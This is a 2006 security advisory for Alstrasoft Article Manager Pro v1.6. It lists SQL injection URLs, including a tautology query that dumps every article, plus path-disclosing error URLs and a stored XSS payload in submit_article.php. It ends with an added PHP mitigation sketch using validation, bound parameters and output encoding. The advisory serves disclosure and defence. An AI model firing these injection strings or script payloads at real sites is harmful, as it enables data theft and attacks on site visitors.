Alstrasoft Article Manager Pro v1.6

2006.05.25
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

Alstrasoft Article Manager Pro v1.6 - XSS & Full Path errors

Homepage: http://www.alstrasoft.com

Description:
Article Manager Pro is the next generation article publishing system designed to make your life a whole lot easier by enabling webmasters to publish articles or news into their website in a matter of minutes with our advanced WYSIWYG editor that includes features such as a built-in spell checker, word finder and many more.

Affected files:
profile.php
userarticles.php
submit_article.php
mrarticles.php
admin.php

Exploits & Vulns:

SQL Injection query error
http://www.example.com/article/profile.php?author_id=1'
1064 : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

SQL Injection:
http://www.example.com/article/userarticles.php?aut_id=3 or 3=3--
Proof Of Concept: All articles in DB appear on page when the above query is performed.

Full path errors
http://www.example.com/article/userarticles.php?aut_id=3'
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html/article/functions.php on line 212
Invalid user id supplied!

http://www.example.com/article/mrarticles.php?action=read'
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html/article/mrarticles.php on line 50

http://www.example.com/article/admin/admin.php?login
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/alstraso/public_html/article/admin/auth.php on line 18

submit_article.php XSS Vuln.
When submitting an article using the submit_article.php file, input is not filtered. All the user has to do is enter something like
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
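
Mitigation sketch for the three issues reported above (an added example, not code from the advisory or from Alstrasoft): the aut_id value is validated and bound as a parameter, errors are logged instead of displayed, and stored text is encoded on output. The articles table, its columns, the helper names and the in-memory SQLite database are assumptions so the script runs offline; the real application uses MySQL.

```php
<?php
// Added example. Schema, function names and SQLite backend are assumptions.
ini_set('display_errors', '0');   // never echo warnings (and file paths) to the client
ini_set('log_errors', '1');       // keep them in the server log instead

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE articles (id INTEGER PRIMARY KEY, aut_id INTEGER, title TEXT)');
// Constructed sample rows; the second title carries the markup quoted in the advisory.
$ins = $db->prepare('INSERT INTO articles (aut_id, title) VALUES (?, ?)');
$ins->execute([3, 'First post']);
$ins->execute([3, '<DIV STYLE="background-image: url(javascript:alert(\'XSS\'))">']);
$ins->execute([7, 'Another author']);

function articlesByAuthor(PDO $db, string $rawId): array
{
    // Digits only: "3'" and "3 or 3=3--" are rejected before any SQL runs.
    if (!ctype_digit($rawId)) {
        throw new InvalidArgumentException('Invalid user id supplied!');
    }
    // Bound parameter: the value is never concatenated into the statement.
    $stmt = $db->prepare('SELECT title FROM articles WHERE aut_id = :id');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

function render(PDO $db, string $rawId): string
{
    try {
        $out = '';
        foreach (articlesByAuthor($db, $rawId) as $title) {
            // Encode on output so stored markup is displayed, not interpreted.
            $out .= '<li>' . htmlspecialchars($title, ENT_QUOTES, 'UTF-8') . "</li>\n";
        }
        return $out;
    } catch (InvalidArgumentException $e) {
        return "Invalid user id supplied!\n";   // generic message, no path or SQL text
    } catch (PDOException $e) {
        error_log($e->getMessage());            // details go to the log only
        return "Internal error.\n";
    }
}

// Inputs taken from the advisory's URLs.
foreach (['3', "3'", '3 or 3=3--'] as $input) {
    echo "aut_id=$input\n", render($db, $input);
}
```

Run with the PHP CLI (pdo_sqlite enabled): only aut_id=3 returns rows, and the DIV payload comes back as escaped text.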

